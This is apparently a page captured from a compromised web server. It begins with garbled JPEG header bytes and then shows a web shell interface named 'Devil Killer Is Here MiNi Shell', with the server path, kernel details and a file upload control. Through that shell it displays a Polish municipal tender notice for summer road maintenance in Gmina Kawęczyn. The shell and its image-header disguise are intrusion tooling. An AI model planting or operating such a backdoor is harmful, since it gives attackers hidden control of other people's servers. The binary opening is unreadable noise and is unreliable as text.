JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250113/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250113/0002714501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Bieżące letnie utrzymanie dróg gminnych i wewnętrznych na terenie Gminy Kawęczyn </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA KAWĘCZYN</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 311019480</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kawęczyn 48</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kawęczyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-704</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL414 - Koniński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">632885934</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ugkaweczyn@kaweczyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kaweczyn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Bieżące letnie utrzymanie dróg gminnych i wewnętrznych na terenie Gminy Kawęczyn </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-fc8e5670-ff00-45a4-8707-d24437d47480</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00027145</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-01-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00017466/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Bieżące letnie utrzymanie dróg gminnych i wewnętrznych na terenie Gminy Kawęczyn</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-fc8e5670-ff00-45a4-8707-d24437d47480 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja pomiędzy Wykonawcami a Zamawiającym w niniejszym<br/>postępowaniu obywa się w języku polskim, w formie elektronicznej, za pomocą środków komunikacji elektronicznej, tj. przy użyciu:<br/>1) platformy e-zamówienia: https://ezamowienia.gov.pl (Platforma)<br/>2) poczty elektronicznej: przetargi@kaweczyn.pl<br/>2. Sposób sporządzenia oraz sposób przekazywania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30<br/>grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U.<br/>2020, poz. 2452).<br/>3. Szczegółowe informacje o sposobie porozumiewania się Zamawiającego z Wykonawcami oraz formie sporządzenia dokumentów<br/>zostały zamieszczone w rozdz. VIII i XI SWZ</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie.<br/>Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy określa Regulamin<br/>Platformy dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum<br/>Pomocy”.<br/>2. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy oraz informacje dotyczące<br/>specyfikacji połączenia określa Regulamin Platformy.<br/>3. Wykonawca składa ofertę za pośrednictwem zakładki „Oferty/wnioski”, widocznej w podglądzie postępowania po zalogowaniu się<br/>na konto Wykonawcy. Po wybraniu przycisku „Złóż ofertę” system prezentuje okno składania oferty umożliwiające przekazanie<br/>dokumentów elektronicznych, w którym znajdują się dwa pola drag&amp;drop („przeciągnij” i „upuść”) służące do dodawania plików.<br/>4. Szyfrowanie ofert odbywa się na Platformie - system sprawdza, czy złożone pliki są podpisane i automatycznie je szyfruje,<br/>jednocześnie informując o tym Wykonawcę. Potwierdzenie czasu przekazania i odbioru oferty znajduje się w Elektronicznym<br/>Potwierdzeniu Przesłania i Elektronicznym Potwierdzeniu Odebrania, które są dostępne dla zalogowanego Wykonawcy w zakładce<br/>„Oferty/Wnioski”.<br/>5. Oferta wraz z wszelkimi dokumentami, powinna być sporządzona w formatach danych określonych w przepisach wydanych na<br/>podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne.<br/>6. Ofertę pod rygorem nieważności składa się w formie elektronicznej tj. opatrzonej kwalifikowanym podpisem elektronicznym lub w<br/>postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>7. Szczegółowe uregulowania w tym zakresie zawarte są w Rozdziale VIII i XI SWZ</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-fc8e5670-ff00-45a4-8707-d24437d47480</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art.13 ust.1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), (dalej jako RODO), Zamawiający informuje, że:<br/>1) administratorem Pani/Pana danych osobowych jest Gmina Kawęczyn, Kawęczyn 48, 62-704 Kawęczyn;<br/>2) jeśli ma Pani/Pan pytania dotyczące sposobu i zakresu przetwarzania Pani/Pana danych osobowych, a także przysługujących<br/>Pani/Panu praw, może się Pani/Pan skontaktować z Inspektorem Ochrony Danych Osobowych za pośrednictwem poczty email: iod@kaweczyn.pl ;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust.1 lit. c RODO w celu związanym z niniejszym<br/>postępowaniem o udzielenie zamówienia publicznego;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>Ogłoszenie nr 2024/BZP 00424673/01 z dnia 2024-07-23<br/>2024-07-23 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na<br/>podstawie: art. 275 pkt 2 ustawy - Usługi<br/>oparciu o art. 18 oraz art. 74 ust.1 ustawy Pzp; a także ustawy o dostępie do informacji publicznej.<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust.1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia; Niezależnie od powyżej wskazanych terminów, dane osobowe będą przetwarzane do<br/>upływu okresu przedawnienia roszczeń wynikających z umowy w sprawie zamówienia publicznego. Dane osobowe mogą być<br/>również przekazywane do organów publicznych i urzędów państwowych lub innych podmiotów upoważnionych na podstawie<br/>przepisów prawa lub wykonujących zadania realizowane w interesie publicznym lub w ramach sprawowania władzy publicznej, w<br/>szczególności do podmiotów prowadzących działalność kontrolną wobec Zamawiającego. Dane osobowe są przekazywane do<br/>podmiotów przetwarzających dane w imieniu administratora danych osobowych. 6) obowiązek podania przez Panią/Pana danych<br/>osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z<br/>udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>8) w przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1–3 RODO, wymagałoby niewspółmiernie dużego<br/>wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu<br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu<br/>lub nazwy lub daty zakończonego postępowania o udzielenie zamówienia;<br/>9) wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenia przedmiotowego postępowania;<br/>10) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych*,<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO**,<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">11) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. *Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować<br/>zmianą wyniku postępowania o udzielenie zamówienia publicznego, ani zmianą postanowień umowy w zakresie niezgodnym z<br/>ustawą Pzp oraz nie może naruszać integralności protokołu<br/>oraz jego załączników.<br/>**Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego. Ponadto Zamawiający informuje, że Wykonawca ubiegając się o<br/>udzielenie zamówienia publicznego jest zobowiązany do<br/>wypełnienia wszystkich obowiązków formalno-prawnych związanych z udziałem w postępowaniu. Do obowiązków tych należą m.in.<br/>obowiązki wynikające z RODO, w szczególności obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych,<br/>których dane osobowe dotyczą i od których dane te Wykonawca bezpośrednio pozyskał. Jednakże obowiązek informacyjny<br/>wynikający z art. 13 RODO nie będzie miał zastosowania, gdy i w zakresie, w jakim osoba fizyczna, której dane dotyczą, dysponuje<br/>już tymi informacjami (vide: art. 13 ust. 4 RODO). Ponadto Wykonawca będzie musiał wypełnić obowiązek informacyjny wynikający z<br/>art. 14 RODO względem osób fizycznych, których dane przekazuje Zamawiającemu i których dane pośrednio pozyskał, chyba że ma<br/>zastosowanie co najmniej jedno z włączeń, o których mowa w art. 14 ust. 5 RODO.<br/>Szczegółowe uregulowania w tym zakresie zawarte są w Rozdziale XX SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ROŚ.271.2.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szczegółowy zakres przedmiotu zamówienia:<br/>I.	Ciąg dróg gminnych i wewnętrznych na terenie gminy Kawęczyn<br/>1.Profilowanie, równanie nawierzchni dróg (żwirowych i gruntowych):<br/>a)	równanie dróg gruntowych i żwirowych poprzez profilowanie jezdni gruntowych,<br/>b)	wyrównywanie zadoleń w jezdni gruntowej,<br/>c)	ścinanie poboczy.<br/>Przy użyciu równiarki lub koparko – ładowarki (caterpillar) <br/>2. Remont bieżący dróg ( żwirowych i gruntowych):<br/>a)	uzupełnianie ubytków w nawierzchni żwirowej i gruntowej,<br/>b)	zakup i rozścielanie kruszywa naturalnego (pospółki żwirowej) frakcji 0 – 63 mm,<br/>c)	sukcesywna dostawa samochodem samowyładowczym we wskazane miejsce przez Zamawiającego.<br/><br/>II.	Ciąg obustronnych poboczy dróg gminnych i wewnętrznych na długości ok. 30 km.<br/>Koszenie poboczy: mechaniczne koszenie poboczy wzdłuż dróg, z użyciem sprzętu mechanicznego z wysięgnikiem umożliwiającym wykaszanie drugiej burty rowu. <br/>Koszenie odbywa się, ze wskazaniem zakresu koszenia tj. wyszczególnienie dróg przez Zamawiającego. <br/>III.	Wywóz oraz przewożenie ziemi, gałęzi, gruzów (materiałów powstałych podczas prac w pasie drogowym) samochodem ciężarowym. <br/>Materiał zabrany przez Wykonawcę w swoim sposobie zagospodarowania lub przewiezienie w miejsce wskazane przez Zamawiającego – we wcześniejszym ustaleniu pomiędzy stronami. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">34144400-2 - Pojazdy utrzymania dróg</p> <p class="mb-0">14210000-6 - Żwir, piasek, kamień kruszony i kruszywa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 6.	Zamawiający zastrzega sobie możliwość zmniejszenia zakresu przedmiotu umowy o 30 %. Zamawiający zastrzega sobie możliwość zwiększenia zakresu przedmiotu zamówienia o 20 % (prawo opcji). Prawo opcji uruchamiane będzie jednorazowo lub sukcesywnie wg zapotrzebowania Zamawiającego na<br/>poszczególne usługi/dostawy zasadach opisanych w niniejszej umowie.<br/>Wykonawcy nie przysługują żadne roszczenia wobec Zamawiającego z tytułu zamówienia mniejszej zakresu przedmiotu zamówienia (opcja zmniejszająca), a także Wykonawcy nie przysługują żadne roszczenia związane z ewentualnym zwiększeniem zakresu przedmiotu zamówienia (opcja zwiększająca). <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-10</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji na otrzymane zgłoszenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki <br/>udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym – Zamawiający nie <br/>wyznacza szczegółowych warunków w tym zakresie,<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub <br/>zawodowej – Zamawiający nie wyznacza szczegółowych warunków w <br/>tym zakresie<br/>3) sytuacji finansowej lub ekonomicznej – Zamawiający nie wyznacza <br/>szczegółowych warunków w tym zakresie,<br/>4) zdolności technicznej lub zawodowej – Wykonawca spełni <br/>warunek jeśli wykaże, że:<br/>a) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a <br/>jeżeli okres prowadzenia działalności jest krótszy – w tym okresie zrealizował <br/>należycie co najmniej jedną usługę bieżącego utrzymania dróg obejmującą<br/>nawożenie dróg kruszywem i/lub koszenie poboczy i/lub wyrównywanie <br/>terenu na kwotę nie niższą niż 60 000 zł brutto oraz <br/>b) dysponuje stosownym potencjałem technicznym w postaci pojazdów lub <br/>ciągników i urządzeń przez cały czas trwania umowy w ilości minimalnej:<br/>• Równiarka – 1 sztuka,<br/>• Samochód ciężarowy samowyładowczy – 1 sztuka,<br/>• Caterpiller – 1 sztuka,<br/>• Ciągnik rolniczy – 1 sztuka,<br/>• Kosiarka – 1 sztuka <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">w celu potwierdzenia braku podstaw wykluczenia, o których mowa w Rozdziale<br/>VI pkt 2:<br/>a) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, <br/>wg wzoru Załącznika nr 4 do SWZ, o braku przynależności do tej samej grupy <br/>kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie <br/>konkurencji i konsumentów (t.j. Dz. U. 2021, poz. 275), z innym Wykonawcą, <br/>który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej <br/>grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi <br/>przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej <br/>samej grupy kapitałowej; wzór oświadczenia stanowi załącznik nr 4 do <br/>SWZ;<br/>b) oświadczenie o aktualności oświadczenia składanego na podstawie art. <br/>125 ust. 1 ustawy Pzp, wzór oświadczenia stanowi załącznik nr 8 do <br/>SWZ;<br/>5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia <br/>13<br/>oświadczenie, o którym mowa w pkt 4 ppkt 3) lit. b składa każdy z tych<br/>Wykonawców.<br/>6. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków <br/>dowodowych, które Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz <br/>potwierdzi ich prawidłowość i aktualność.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca zobowiązany jest przedłożyć wraz z ofertą aktualne na dzień <br/>składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz <br/>o braku podstaw do wykluczenia z postępowania – zgodnie z Załącznikiem nr 2 do <br/>SWZ. Stanowi ono dowód potwierdzający brak podstaw wykluczenia, spełnianie <br/>warunków udziału w postępowaniu na dzień składania ofert, tymczasowo <br/>zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia <br/>oświadczenie, o którym mowa w pkt 1, składa każdy z Wykonawców 